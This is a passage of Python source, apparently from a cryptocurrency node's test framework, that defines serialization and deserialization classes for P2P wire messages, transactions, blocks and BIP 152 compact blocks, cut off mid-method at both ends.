    """Serialize a list of ints as CompactSize count + signed 32-bit entries."""
    return ser_compact_size(len(l)) + b"".join(struct.pack("<i", i) for i in l)
# Deserialize from a hex string representation (eg from RPC)
def FromHex(obj, hex_string):
    """Deserialize `obj` from a hex string (e.g. RPC output) and return it."""
    raw = hex_str_to_bytes(hex_string)
    obj.deserialize(BytesIO(raw))
    return obj
# Convert a binary-serializable object to hex (eg for submission via RPC)
def ToHex(obj):
    """Serialize `obj` and return its hex encoding (e.g. for RPC submission)."""
    raw = obj.serialize()
    return bytes_to_hex_str(raw)
# Objects that map to kredsd objects, which can be serialized/deserialized
class CAddress(object):
    """A network address as sent on the wire: services, IPv4 address, port."""

    def __init__(self):
        self.nServices = 1
        # Ten zero bytes + two 0xff bytes: the IPv4-in-IPv6 mapping prefix.
        self.pchReserved = b"\x00" * 10 + b"\xff" * 2
        self.ip = "0.0.0.0"
        self.port = 0

    def deserialize(self, f):
        """Parse services, prefix, IPv4 address and big-endian port from `f`."""
        (self.nServices,) = struct.unpack("<Q", f.read(8))
        self.pchReserved = f.read(12)
        self.ip = socket.inet_ntoa(f.read(4))
        (self.port,) = struct.unpack(">H", f.read(2))

    def serialize(self):
        """Return the 26-byte wire encoding of this address."""
        parts = [
            struct.pack("<Q", self.nServices),
            self.pchReserved,
            socket.inet_aton(self.ip),
            struct.pack(">H", self.port),
        ]
        return b"".join(parts)

    def __repr__(self):
        return "CAddress(nServices=%i ip=%s port=%i)" % (self.nServices,
                                                         self.ip, self.port)
# Bit OR-ed into a CInv type to request the witness-including serialization (BIP144).
MSG_WITNESS_FLAG = 1<<30
class CInv(object):
    """An inventory vector entry: a type code plus an object hash."""

    # Human-readable names for the known inventory type codes.
    typemap = {
        0: "Error",
        1: "TX",
        2: "Block",
        1 | MSG_WITNESS_FLAG: "WitnessTx",
        2 | MSG_WITNESS_FLAG: "WitnessBlock",
        4: "CompactBlock",
    }

    def __init__(self, t=0, h=0):
        self.type = t
        self.hash = h

    def deserialize(self, f):
        (self.type,) = struct.unpack("<i", f.read(4))
        self.hash = deser_uint256(f)

    def serialize(self):
        return struct.pack("<i", self.type) + ser_uint256(self.hash)

    def __repr__(self):
        return "CInv(type=%s hash=%064x)" \
            % (self.typemap[self.type], self.hash)
class CBlockLocator(object):
    """A block locator: protocol version plus a list of known block hashes."""

    def __init__(self):
        self.nVersion = MY_VERSION
        self.vHave = []

    def deserialize(self, f):
        (self.nVersion,) = struct.unpack("<i", f.read(4))
        self.vHave = deser_uint256_vector(f)

    def serialize(self):
        return struct.pack("<i", self.nVersion) + ser_uint256_vector(self.vHave)

    def __repr__(self):
        return "CBlockLocator(nVersion=%i vHave=%s)" \
            % (self.nVersion, repr(self.vHave))
class COutPoint(object):
    """Reference to a transaction output: (txid as integer, output index n)."""

    def __init__(self, hash=0, n=0):
        self.hash = hash
        self.n = n

    def deserialize(self, f):
        self.hash = deser_uint256(f)
        (self.n,) = struct.unpack("<I", f.read(4))

    def serialize(self):
        return ser_uint256(self.hash) + struct.pack("<I", self.n)

    def __repr__(self):
        return "COutPoint(hash=%064x n=%i)" % (self.hash, self.n)
class CTxIn(object):
    """A transaction input: previous outpoint, scriptSig, sequence number."""

    def __init__(self, outpoint=None, scriptSig=b"", nSequence=0):
        # Default to a null outpoint when none is supplied.
        self.prevout = COutPoint() if outpoint is None else outpoint
        self.scriptSig = scriptSig
        self.nSequence = nSequence

    def deserialize(self, f):
        self.prevout = COutPoint()
        self.prevout.deserialize(f)
        self.scriptSig = deser_string(f)
        (self.nSequence,) = struct.unpack("<I", f.read(4))

    def serialize(self):
        return (self.prevout.serialize()
                + ser_string(self.scriptSig)
                + struct.pack("<I", self.nSequence))

    def __repr__(self):
        return "CTxIn(prevout=%s scriptSig=%s nSequence=%i)" \
            % (repr(self.prevout), bytes_to_hex_str(self.scriptSig),
               self.nSequence)
class CTxOut(object):
    """A transaction output: value in satoshis plus a scriptPubKey."""

    def __init__(self, nValue=0, scriptPubKey=b""):
        self.nValue = nValue
        self.scriptPubKey = scriptPubKey

    def deserialize(self, f):
        (self.nValue,) = struct.unpack("<q", f.read(8))
        self.scriptPubKey = deser_string(f)

    def serialize(self):
        return struct.pack("<q", self.nValue) + ser_string(self.scriptPubKey)

    def __repr__(self):
        return "CTxOut(nValue=%i.%08i scriptPubKey=%s)" \
            % (self.nValue // COIN, self.nValue % COIN,
               bytes_to_hex_str(self.scriptPubKey))
class CScriptWitness(object):
    """The witness stack for one input: a list of byte strings."""

    def __init__(self):
        # stack is a vector of strings
        self.stack = []

    def __repr__(self):
        return "CScriptWitness(%s)" % \
            (",".join([bytes_to_hex_str(x) for x in self.stack]))

    def is_null(self):
        """True when the witness stack is empty."""
        return not self.stack
class CTxInWitness(object):
    """Witness data for a single transaction input."""

    def __init__(self):
        self.scriptWitness = CScriptWitness()

    def deserialize(self, f):
        self.scriptWitness.stack = deser_string_vector(f)

    def serialize(self):
        return ser_string_vector(self.scriptWitness.stack)

    def __repr__(self):
        return repr(self.scriptWitness)

    def is_null(self):
        return self.scriptWitness.is_null()
class CTxWitness(object):
    """Witness data for all inputs of a transaction."""

    def __init__(self):
        self.vtxinwit = []

    def deserialize(self, f):
        # The count is not encoded on the wire: it must equal the tx's vin
        # length, so callers pre-populate vtxinwit before calling this.
        for witness in self.vtxinwit:
            witness.deserialize(f)

    def serialize(self):
        # Deliberately omits the vector length -- it mirrors the vin vector.
        return b"".join(witness.serialize() for witness in self.vtxinwit)

    def __repr__(self):
        return "CTxWitness(%s)" % \
            (';'.join([repr(x) for x in self.vtxinwit]))

    def is_null(self):
        """True when every per-input witness is empty."""
        return all(witness.is_null() for witness in self.vtxinwit)
class CTransaction(object):
    """A transaction, with optional segwit witness data (BIP141/BIP144)."""
    def __init__(self, tx=None):
        # Copy-construct from `tx` when given, otherwise build an empty tx.
        if tx is None:
            self.nVersion = 1
            self.vin = []
            self.vout = []
            self.wit = CTxWitness()
            self.nLockTime = 0
            # Cached txid values; None means "not yet computed".
            self.sha256 = None
            self.hash = None
        else:
            self.nVersion = tx.nVersion
            self.vin = copy.deepcopy(tx.vin)
            self.vout = copy.deepcopy(tx.vout)
            self.nLockTime = tx.nLockTime
            self.sha256 = tx.sha256
            self.hash = tx.hash
            self.wit = copy.deepcopy(tx.wit)
    def deserialize(self, f):
        """Parse a transaction (legacy or BIP144 extended format) from `f`."""
        self.nVersion = struct.unpack("<i", f.read(4))[0]
        self.vin = deser_vector(f, CTxIn)
        flags = 0
        if len(self.vin) == 0:
            # An empty vin marks the extended format: a flags byte follows.
            flags = struct.unpack("<B", f.read(1))[0]
            # Not sure why flags can't be zero, but this
            # matches the implementation in kredsd
            if (flags != 0):
                self.vin = deser_vector(f, CTxIn)
                self.vout = deser_vector(f, CTxOut)
        else:
            self.vout = deser_vector(f, CTxOut)
        if flags != 0:
            # One witness entry per input, then the witness payload itself.
            self.wit.vtxinwit = [CTxInWitness() for i in range(len(self.vin))]
            self.wit.deserialize(f)
        self.nLockTime = struct.unpack("<I", f.read(4))[0]
        # Invalidate the cached txid after mutating the fields.
        self.sha256 = None
        self.hash = None
    def serialize_without_witness(self):
        """Serialize in the legacy (pre-segwit) format."""
        r = b""
        r += struct.pack("<i", self.nVersion)
        r += ser_vector(self.vin)
        r += ser_vector(self.vout)
        r += struct.pack("<I", self.nLockTime)
        return r
    # Only serialize with witness when explicitly called for
    def serialize_with_witness(self):
        """Serialize in the BIP144 extended format (marker, flags, witness)."""
        flags = 0
        if not self.wit.is_null():
            flags |= 1
        r = b""
        r += struct.pack("<i", self.nVersion)
        if flags:
            # Empty vin vector acts as the 0x00 marker byte, then flags.
            dummy = []
            r += ser_vector(dummy)
            r += struct.pack("<B", flags)
        r += ser_vector(self.vin)
        r += ser_vector(self.vout)
        if flags & 1:
            if (len(self.wit.vtxinwit) != len(self.vin)):
                # vtxinwit must have the same length as vin
                self.wit.vtxinwit = self.wit.vtxinwit[:len(self.vin)]
                for i in range(len(self.wit.vtxinwit), len(self.vin)):
                    self.wit.vtxinwit.append(CTxInWitness())
            r += self.wit.serialize()
        r += struct.pack("<I", self.nLockTime)
        return r
    # Regular serialization is without witness -- must explicitly
    # call serialize_with_witness to include witness data.
    def serialize(self):
        return self.serialize_without_witness()
    # Recalculate the txid (transaction hash without witness)
    def rehash(self):
        self.sha256 = None
        self.calc_sha256()
    # We will only cache the serialization without witness in
    # self.sha256 and self.hash -- those are expected to be the txid.
    def calc_sha256(self, with_witness=False):
        """Compute the tx hash; the legacy (txid) form is cached on self."""
        if with_witness:
            # Don't cache the result, just return it
            return uint256_from_str(hash256(self.serialize_with_witness()))
        if self.sha256 is None:
            self.sha256 = uint256_from_str(hash256(self.serialize_without_witness()))
        self.hash = encode(hash256(self.serialize())[::-1], 'hex_codec').decode('ascii')
    def is_valid(self):
        """Basic sanity check: every output value within [0, 21M coins]."""
        self.calc_sha256()
        for tout in self.vout:
            if tout.nValue < 0 or tout.nValue > 21000000 * COIN:
                return False
        return True
    def __repr__(self):
        return "CTransaction(nVersion=%i vin=%s vout=%s wit=%s nLockTime=%i)" \
            % (self.nVersion, repr(self.vin), repr(self.vout), repr(self.wit), self.nLockTime)
class CBlockHeader(object):
    """An 80-byte block header with lazily cached sha256/hash values.

    Improvement: calc_sha256() previously re-packed every header field,
    duplicating serialize() line for line; it now reuses the serializer
    (invoked explicitly as CBlockHeader.serialize so that CBlock's
    transaction-appending override is never picked up).
    """
    def __init__(self, header=None):
        # Copy-construct from `header` when given, otherwise null out.
        if header is None:
            self.set_null()
        else:
            self.nVersion = header.nVersion
            self.hashPrevBlock = header.hashPrevBlock
            self.hashMerkleRoot = header.hashMerkleRoot
            self.nTime = header.nTime
            self.nBits = header.nBits
            self.nNonce = header.nNonce
            self.sha256 = header.sha256
            self.hash = header.hash
            self.calc_sha256()
    def set_null(self):
        """Reset every field to the null header."""
        self.nVersion = 1
        self.hashPrevBlock = 0
        self.hashMerkleRoot = 0
        self.nTime = 0
        self.nBits = 0
        self.nNonce = 0
        # Cached hashes; None means "not yet computed".
        self.sha256 = None
        self.hash = None
    def deserialize(self, f):
        """Parse the 80-byte header from stream `f` and invalidate the cache."""
        self.nVersion = struct.unpack("<i", f.read(4))[0]
        self.hashPrevBlock = deser_uint256(f)
        self.hashMerkleRoot = deser_uint256(f)
        self.nTime = struct.unpack("<I", f.read(4))[0]
        self.nBits = struct.unpack("<I", f.read(4))[0]
        self.nNonce = struct.unpack("<I", f.read(4))[0]
        self.sha256 = None
        self.hash = None
    def serialize(self):
        """Return the 80-byte wire encoding of the header."""
        r = b""
        r += struct.pack("<i", self.nVersion)
        r += ser_uint256(self.hashPrevBlock)
        r += ser_uint256(self.hashMerkleRoot)
        r += struct.pack("<I", self.nTime)
        r += struct.pack("<I", self.nBits)
        r += struct.pack("<I", self.nNonce)
        return r
    def calc_sha256(self):
        """Populate self.sha256/self.hash from the header fields (cached)."""
        if self.sha256 is None:
            # Call CBlockHeader.serialize explicitly: CBlock overrides
            # serialize() to append transactions, but the block hash covers
            # only the 80-byte header.
            r = CBlockHeader.serialize(self)
            self.sha256 = uint256_from_str(hash256(r))
            self.hash = encode(hash256(r)[::-1], 'hex_codec').decode('ascii')
    def rehash(self):
        """Force recomputation of the cached hash and return it."""
        self.sha256 = None
        self.calc_sha256()
        return self.sha256
    def __repr__(self):
        return "CBlockHeader(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x)" \
            % (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
               time.ctime(self.nTime), self.nBits, self.nNonce)
class CBlock(CBlockHeader):
    """A full block: the header fields plus a vector of transactions."""

    def __init__(self, header=None):
        super(CBlock, self).__init__(header)
        self.vtx = []

    def deserialize(self, f):
        super(CBlock, self).deserialize(f)
        self.vtx = deser_vector(f, CTransaction)

    def serialize(self, with_witness=False):
        """Serialize header + transactions; witness form selected by flag."""
        r = b""
        r += super(CBlock, self).serialize()
        if with_witness:
            r += ser_vector(self.vtx, "serialize_with_witness")
        else:
            r += ser_vector(self.vtx)
        return r

    # Calculate the merkle root given a vector of transaction hashes
    def get_merkle_root(self, hashes):
        # Levels with an odd count duplicate the last hash (Bitcoin rule).
        while len(hashes) > 1:
            newhashes = []
            for i in range(0, len(hashes), 2):
                i2 = min(i+1, len(hashes)-1)
                newhashes.append(hash256(hashes[i] + hashes[i2]))
            hashes = newhashes
        return uint256_from_str(hashes[0])

    def calc_merkle_root(self):
        """Merkle root over the txids of self.vtx."""
        hashes = []
        for tx in self.vtx:
            tx.calc_sha256()
            hashes.append(ser_uint256(tx.sha256))
        return self.get_merkle_root(hashes)

    def calc_witness_merkle_root(self):
        # For witness root purposes, the hash of the
        # coinbase, with witness, is defined to be 0...0
        hashes = [ser_uint256(0)]
        for tx in self.vtx[1:]:
            # Calculate the hashes with witness data
            hashes.append(ser_uint256(tx.calc_sha256(True)))
        return self.get_merkle_root(hashes)

    def is_valid(self):
        """Check proof of work, each transaction, and the merkle root."""
        self.calc_sha256()
        target = uint256_from_compact(self.nBits)
        if self.sha256 > target:
            return False
        for tx in self.vtx:
            if not tx.is_valid():
                return False
        if self.calc_merkle_root() != self.hashMerkleRoot:
            return False
        return True

    def solve(self):
        """Grind nNonce until the header hash meets the nBits target."""
        self.rehash()
        target = uint256_from_compact(self.nBits)
        while self.sha256 > target:
            self.nNonce += 1
            self.rehash()

    def __repr__(self):
        return "CBlock(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x vtx=%s)" \
            % (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
               time.ctime(self.nTime), self.nBits, self.nNonce, repr(self.vtx))
class CUnsignedAlert(object):
    """Payload of a (legacy) network alert message, before signing."""

    def __init__(self):
        # Validity / targeting fields
        self.nVersion = 1
        self.nRelayUntil = 0
        self.nExpiration = 0
        self.nID = 0
        self.nCancel = 0
        self.setCancel = []
        self.nMinVer = 0
        self.nMaxVer = 0
        self.setSubVer = []
        self.nPriority = 0
        # Display strings
        self.strComment = b""
        self.strStatusBar = b""
        self.strReserved = b""

    def deserialize(self, f):
        """Read all fields in wire order from file-like object *f*."""
        self.nVersion = struct.unpack("<i", f.read(4))[0]
        self.nRelayUntil = struct.unpack("<q", f.read(8))[0]
        self.nExpiration = struct.unpack("<q", f.read(8))[0]
        self.nID = struct.unpack("<i", f.read(4))[0]
        self.nCancel = struct.unpack("<i", f.read(4))[0]
        self.setCancel = deser_int_vector(f)
        self.nMinVer = struct.unpack("<i", f.read(4))[0]
        self.nMaxVer = struct.unpack("<i", f.read(4))[0]
        self.setSubVer = deser_string_vector(f)
        self.nPriority = struct.unpack("<i", f.read(4))[0]
        self.strComment = deser_string(f)
        self.strStatusBar = deser_string(f)
        self.strReserved = deser_string(f)

    def serialize(self):
        """Write all fields in the same wire order as deserialize()."""
        r = b""
        r += struct.pack("<i", self.nVersion)
        r += struct.pack("<q", self.nRelayUntil)
        r += struct.pack("<q", self.nExpiration)
        r += struct.pack("<i", self.nID)
        r += struct.pack("<i", self.nCancel)
        r += ser_int_vector(self.setCancel)
        r += struct.pack("<i", self.nMinVer)
        r += struct.pack("<i", self.nMaxVer)
        r += ser_string_vector(self.setSubVer)
        r += struct.pack("<i", self.nPriority)
        r += ser_string(self.strComment)
        r += ser_string(self.strStatusBar)
        r += ser_string(self.strReserved)
        return r

    def __repr__(self):
        return "CUnsignedAlert(nVersion %d, nRelayUntil %d, nExpiration %d, nID %d, nCancel %d, nMinVer %d, nMaxVer %d, nPriority %d, strComment %s, strStatusBar %s, strReserved %s)" \
            % (self.nVersion, self.nRelayUntil, self.nExpiration, self.nID,
               self.nCancel, self.nMinVer, self.nMaxVer, self.nPriority,
               self.strComment, self.strStatusBar, self.strReserved)
class CAlert(object):
    """Signed alert: opaque serialized payload plus its signature bytes."""

    def __init__(self):
        self.vchMsg = b""
        self.vchSig = b""

    def deserialize(self, f):
        """Read the payload and signature strings from *f*."""
        self.vchMsg = deser_string(f)
        self.vchSig = deser_string(f)

    def serialize(self):
        """Encode payload followed by signature."""
        return ser_string(self.vchMsg) + ser_string(self.vchSig)

    def __repr__(self):
        return "CAlert(vchMsg.sz %d, vchSig.sz %d)" \
            % (len(self.vchMsg), len(self.vchSig))
class PrefilledTransaction(object):
    """A (differentially-encoded index, transaction) pair inside a compact block."""

    def __init__(self, index=0, tx=None):
        self.index = index
        self.tx = tx

    def deserialize(self, f):
        """Read the compact-size index followed by the transaction."""
        self.index = deser_compact_size(f)
        self.tx = CTransaction()
        self.tx.deserialize(f)

    def serialize(self, with_witness=False):
        """Encode index + transaction, with or without witness data."""
        if with_witness:
            body = self.tx.serialize_with_witness()
        else:
            body = self.tx.serialize_without_witness()
        return ser_compact_size(self.index) + body

    def serialize_with_witness(self):
        return self.serialize(with_witness=True)

    def __repr__(self):
        return "PrefilledTransaction(index=%d, tx=%s)" % (self.index, repr(self.tx))
# This is what we send on the wire, in a cmpctblock message.
class P2PHeaderAndShortIDs(object):
    """Wire-format BIP 152 compact block: header, nonce, shortids, prefilled txs."""

    def __init__(self):
        self.header = CBlockHeader()
        self.nonce = 0
        self.shortids_length = 0
        self.shortids = []
        self.prefilled_txn_length = 0
        self.prefilled_txn = []

    def deserialize(self, f):
        self.header.deserialize(f)
        self.nonce = struct.unpack("<Q", f.read(8))[0]
        self.shortids_length = deser_compact_size(f)
        for i in range(self.shortids_length):
            # shortids are defined to be 6 bytes in the spec, so append
            # two zero bytes and read it in as an 8-byte number
            self.shortids.append(struct.unpack("<Q", f.read(6) + b'\x00\x00')[0])
        self.prefilled_txn = deser_vector(f, PrefilledTransaction)
        self.prefilled_txn_length = len(self.prefilled_txn)

    # When using version 2 compact blocks, we must serialize with_witness.
    def serialize(self, with_witness=False):
        r = b""
        r += self.header.serialize()
        r += struct.pack("<Q", self.nonce)
        r += ser_compact_size(self.shortids_length)
        for x in self.shortids:
            # We only want the first 6 bytes
            r += struct.pack("<Q", x)[0:6]
        if with_witness:
            r += ser_vector(self.prefilled_txn, "serialize_with_witness")
        else:
            r += ser_vector(self.prefilled_txn)
        return r

    def __repr__(self):
        return "P2PHeaderAndShortIDs(header=%s, nonce=%d, shortids_length=%d, shortids=%s, prefilled_txn_length=%d, prefilledtxn=%s" % (repr(self.header), self.nonce, self.shortids_length, repr(self.shortids), self.prefilled_txn_length, repr(self.prefilled_txn))
# P2P version of the above that will use witness serialization (for compact
# block version 2)
class P2PHeaderAndShortWitnessIDs(P2PHeaderAndShortIDs):
    """Compact block payload that always serializes prefilled txs with witness."""

    def serialize(self):
        return super().serialize(with_witness=True)
# Calculate the BIP 152-compact blocks shortid for a given transaction hash
def calculate_shortid(k0, k1, tx_hash):
    """Return the 48-bit (6-byte) BIP 152 short transaction id."""
    return siphash256(k0, k1, tx_hash) & 0x0000ffffffffffff
# This version gets rid of the array lengths, and reinterprets the differential
# encoding into indices that can be used for lookup.
class HeaderAndShortIDs(object):
    """Decoded (absolute-index) view of a BIP 152 compact block."""

    def __init__(self, p2pheaders_and_shortids=None):
        self.header = CBlockHeader()
        self.nonce = 0
        self.shortids = []
        self.prefilled_txn = []
        self.use_witness = False
        # `is not None` instead of `!= None` (identity check is the correct idiom).
        if p2pheaders_and_shortids is not None:
            self.header = p2pheaders_and_shortids.header
            self.nonce = p2pheaders_and_shortids.nonce
            self.shortids = p2pheaders_and_shortids.shortids
            # Undo differential encoding: each wire index is an offset from
            # the previous absolute index + 1.
            last_index = -1
            for x in p2pheaders_and_shortids.prefilled_txn:
                self.prefilled_txn.append(PrefilledTransaction(x.index + last_index + 1, x.tx))
                last_index = self.prefilled_txn[-1].index

    def to_p2p(self):
        """Convert back to the differentially-encoded wire representation."""
        if self.use_witness:
            ret = P2PHeaderAndShortWitnessIDs()
        else:
            ret = P2PHeaderAndShortIDs()
        ret.header = self.header
        ret.nonce = self.nonce
        ret.shortids_length = len(self.shortids)
        ret.shortids = self.shortids
        ret.prefilled_txn_length = len(self.prefilled_txn)
        ret.prefilled_txn = []
        last_index = -1
        for x in self.prefilled_txn:
            ret.prefilled_txn.append(PrefilledTransaction(x.index - last_index - 1, x.tx))
            last_index = x.index
        return ret

    def get_siphash_keys(self):
        """Derive the two SipHash keys from sha256(serialized header || nonce)."""
        header_nonce = self.header.serialize()
        header_nonce += struct.pack("<Q", self.nonce)
        hash_header_nonce_as_str = sha256(header_nonce)
        key0 = struct.unpack("<Q", hash_header_nonce_as_str[0:8])[0]
        key1 = struct.unpack("<Q", hash_header_nonce_as_str[8:16])[0]
        return [key0, key1]

    # Version 2 compact blocks use wtxid in shortids (rather than txid)
    def initialize_from_block(self, block, nonce=0, prefill_list=(0,), use_witness=False):
        """Populate this object from a CBlock.

        ``prefill_list`` names the tx indices sent in full. The default is now
        an immutable tuple — the original mutable-list default ``[0]`` is a
        Python anti-pattern; iteration/membership semantics are unchanged.
        """
        self.header = CBlockHeader(block)
        self.nonce = nonce
        self.prefilled_txn = [PrefilledTransaction(i, block.vtx[i]) for i in prefill_list]
        self.shortids = []
        self.use_witness = use_witness
        [k0, k1] = self.get_siphash_keys()
        for i in range(len(block.vtx)):
            if i not in prefill_list:
                tx_hash = block.vtx[i].sha256
                if use_witness:
                    tx_hash = block.vtx[i].calc_sha256(with_witness=True)
                self.shortids.append(calculate_shortid(k0, k1, tx_hash))

    def __repr__(self):
        return "HeaderAndShortIDs(header=%s, nonce=%d, shortids=%s, prefilledtxn=%s" % (repr(self.header), self.nonce, repr(self.shortids), repr(self.prefilled_txn))
class BlockTransactionsRequest(object):
    """getblocktxn payload: a block hash plus differentially encoded tx indexes."""

    def __init__(self, blockhash=0, indexes=None):
        self.blockhash = blockhash
        self.indexes = [] if indexes is None else indexes

    def deserialize(self, f):
        """Read the block hash and the compact-size index list."""
        self.blockhash = deser_uint256(f)
        count = deser_compact_size(f)
        for _ in range(count):
            self.indexes.append(deser_compact_size(f))

    def serialize(self):
        """Encode the block hash, index count, and each differential index."""
        parts = [ser_uint256(self.blockhash), ser_compact_size(len(self.indexes))]
        parts.extend(ser_compact_size(idx) for idx in self.indexes)
        return b"".join(parts)

    # helper to set the differentially encoded indexes from absolute ones
    def from_absolute(self, absolute_indexes):
        """Store *absolute_indexes* in the wire's differential encoding."""
        self.indexes = []
        prev = -1
        for idx in absolute_indexes:
            self.indexes.append(idx - prev - 1)
            prev = idx

    def to_absolute(self):
        """Decode the stored differential indexes back to absolute ones."""
        absolute = []
        prev = -1
        for delta in self.indexes:
            prev = delta + prev + 1
            absolute.append(prev)
        return absolute

    def __repr__(self):
        return "BlockTransactionsRequest(hash=%064x indexes=%s)" % (self.blockhash, repr(self.indexes))
class BlockTransactions(object):
    """blocktxn payload: a block hash plus the requested transactions."""

    def __init__(self, blockhash=0, transactions=None):
        self.blockhash = blockhash
        self.transactions = [] if transactions is None else transactions

    def deserialize(self, f):
        self.blockhash = deser_uint256(f)
        self.transactions = deser_vector(f, CTransaction)

    def serialize(self, with_witness=False):
        """Encode the block hash then the tx vector (witness form optional)."""
        prefix = ser_uint256(self.blockhash)
        if with_witness:
            return prefix + ser_vector(self.transactions, "serialize_with_witness")
        return prefix + ser_vector(self.transactions)

    def __repr__(self):
        return "BlockTransactions(hash=%064x transactions=%s)" % (self.blockhash, repr(self.transactions))
# Objects that correspond to messages on the wire
class msg_version(object):
    """version handshake message; field layout depends on protocol version."""
    command = b"version"

    def __init__(self):
        self.nVersion = MY_VERSION
        self.nServices = 1
        self.nTime = int(time.time())
        self.addrTo = CAddress()
        self.addrFrom = CAddress()
        self.nNonce = random.getrandbits(64)
        self.strSubVer = MY_SUBVERSION
        self.nStartingHeight = -1
        self.nRelay = MY_RELAY

    def deserialize(self, f):
        """Read a version message, honouring historical layout quirks."""
        self.nVersion = struct.unpack("<i", f.read(4))[0]
        # Historical quirk: protocol 10300 is treated as 300.
        if self.nVersion == 10300:
            self.nVersion = 300
        self.nServices = struct.unpack("<Q", f.read(8))[0]
        self.nTime = struct.unpack("<q", f.read(8))[0]
        self.addrTo = CAddress()
        self.addrTo.deserialize(f)
        if self.nVersion >= 106:
            self.addrFrom = CAddress()
            self.addrFrom.deserialize(f)
            self.nNonce = struct.unpack("<Q", f.read(8))[0]
            self.strSubVer = deser_string(f)
        else:
            # Very old peers omit these fields entirely.
            self.addrFrom = None
            self.nNonce = None
            self.strSubVer = None
            self.nStartingHeight = None
        if self.nVersion >= 209:
            self.nStartingHeight = struct.unpack("<i", f.read(4))[0]
        else:
            self.nStartingHeight = None
        if self.nVersion >= 70001:
            # Relay field is optional for version 70001 onwards
            try:
                self.nRelay = struct.unpack("<b", f.read(1))[0]
            except:
                self.nRelay = 0
        else:
            self.nRelay = 0

    def serialize(self):
        """Write the message in the modern (>= 70001) layout."""
        r = b""
        r += struct.pack("<i", self.nVersion)
        r += struct.pack("<Q", self.nServices)
        r += struct.pack("<q", self.nTime)
        r += self.addrTo.serialize()
        r += self.addrFrom.serialize()
        r += struct.pack("<Q", self.nNonce)
        r += ser_string(self.strSubVer)
        r += struct.pack("<i", self.nStartingHeight)
        r += struct.pack("<b", self.nRelay)
        return r

    def __repr__(self):
        return 'msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i nRelay=%i)' \
            % (self.nVersion, self.nServices, time.ctime(self.nTime),
               repr(self.addrTo), repr(self.addrFrom), self.nNonce,
               self.strSubVer, self.nStartingHeight, self.nRelay)
class msg_verack(object):
    """verack: empty acknowledgement of a peer's version message."""
    command = b"verack"

    def __init__(self):
        pass

    def deserialize(self, f):
        pass  # no payload

    def serialize(self):
        return b""

    def __repr__(self):
        return "msg_verack()"
class msg_addr(object):
    """addr message: a vector of known peer addresses."""
    command = b"addr"

    def __init__(self):
        self.addrs = []

    def deserialize(self, f):
        self.addrs = deser_vector(f, CAddress)

    def serialize(self):
        return ser_vector(self.addrs)

    def __repr__(self):
        return "msg_addr(addrs=%s)" % (repr(self.addrs))
class msg_alert(object):
    """alert message wrapping a signed CAlert payload."""
    command = b"alert"

    def __init__(self):
        self.alert = CAlert()

    def deserialize(self, f):
        fresh = CAlert()
        fresh.deserialize(f)
        self.alert = fresh

    def serialize(self):
        return self.alert.serialize()

    def __repr__(self):
        return "msg_alert(alert=%s)" % (repr(self.alert), )
class msg_inv(object):
    """inv message advertising objects (blocks/transactions) by hash."""
    command = b"inv"

    def __init__(self, inv=None):
        self.inv = [] if inv is None else inv

    def deserialize(self, f):
        self.inv = deser_vector(f, CInv)

    def serialize(self):
        return ser_vector(self.inv)

    def __repr__(self):
        return "msg_inv(inv=%s)" % (repr(self.inv))
class msg_getdata(object):
    """getdata message requesting objects previously advertised via inv."""
    command = b"getdata"

    def __init__(self, inv=None):
        if inv is None:
            self.inv = []
        else:
            self.inv = inv

    def deserialize(self, f):
        self.inv = deser_vector(f, CInv)

    def serialize(self):
        return ser_vector(self.inv)

    def __repr__(self):
        return "msg_getdata(inv=%s)" % (repr(self.inv))
class msg_getblocks(object):
    """getblocks request: a block locator plus a stop hash (0 = no limit)."""
    command = b"getblocks"

    def __init__(self):
        self.locator = CBlockLocator()
        self.hashstop = 0

    def deserialize(self, f):
        self.locator = CBlockLocator()
        self.locator.deserialize(f)
        self.hashstop = deser_uint256(f)

    def serialize(self):
        return self.locator.serialize() + ser_uint256(self.hashstop)

    def __repr__(self):
        return "msg_getblocks(locator=%s hashstop=%064x)" \
            % (repr(self.locator), self.hashstop)
class msg_tx(object):
    """tx message carrying a single transaction (non-witness serialization)."""
    command = b"tx"

    def __init__(self, tx=None):
        # Bug fix: the original signature was `def __init__(self, tx=CTransaction())`,
        # a mutable default argument — every msg_tx() shared ONE CTransaction
        # instance, so deserializing one message mutated all the others.
        # Each call now gets a fresh transaction when none is supplied.
        self.tx = tx if tx is not None else CTransaction()

    def deserialize(self, f):
        self.tx.deserialize(f)

    def serialize(self):
        return self.tx.serialize_without_witness()

    def __repr__(self):
        return "msg_tx(tx=%s)" % (repr(self.tx))
class msg_witness_tx(msg_tx):
    """Same as msg_tx but serializes the transaction with witness data."""
    def serialize(self):
        return self.tx.serialize_with_witness()
class msg_block(object):
    """block message carrying a full block (non-witness serialization)."""
    command = b"block"

    def __init__(self, block=None):
        self.block = CBlock() if block is None else block

    def deserialize(self, f):
        self.block.deserialize(f)

    def serialize(self):
        return self.block.serialize()

    def __repr__(self):
        return "msg_block(block=%s)" % (repr(self.block))
# for cases where a user needs tighter control over what is sent over the wire
# note that the user must supply the name of the command, and the data
class msg_generic(object):
    """Raw message: caller supplies the command name and payload bytes verbatim."""

    def __init__(self, command, data=None):
        self.command = command
        self.data = data

    def serialize(self):
        # The payload is sent exactly as supplied.
        return self.data

    def __repr__(self):
        return "msg_generic()"
class msg_witness_block(msg_block):
    """block message serialized with witness data."""

    def serialize(self):
        return self.block.serialize(with_witness=True)
class msg_getaddr(object):
    """getaddr: empty request for the peer's known addresses."""
    command = b"getaddr"

    def __init__(self):
        pass

    def deserialize(self, f):
        pass  # no payload

    def serialize(self):
        return b""

    def __repr__(self):
        return "msg_getaddr()"
class msg_ping_prebip31(object):
    """Legacy ping (pre-BIP 31): carries no nonce and expects no pong."""
    command = b"ping"

    def __init__(self):
        pass

    def deserialize(self, f):
        pass  # no payload

    def serialize(self):
        return b""

    def __repr__(self):
        return "msg_ping() (pre-bip31)"
class msg_ping(object):
    """ping (BIP 31): carries a 64-bit nonce that the peer echoes in pong."""
    command = b"ping"

    def __init__(self, nonce=0):
        self.nonce = nonce

    def deserialize(self, f):
        (self.nonce,) = struct.unpack("<Q", f.read(8))

    def serialize(self):
        return struct.pack("<Q", self.nonce)

    def __repr__(self):
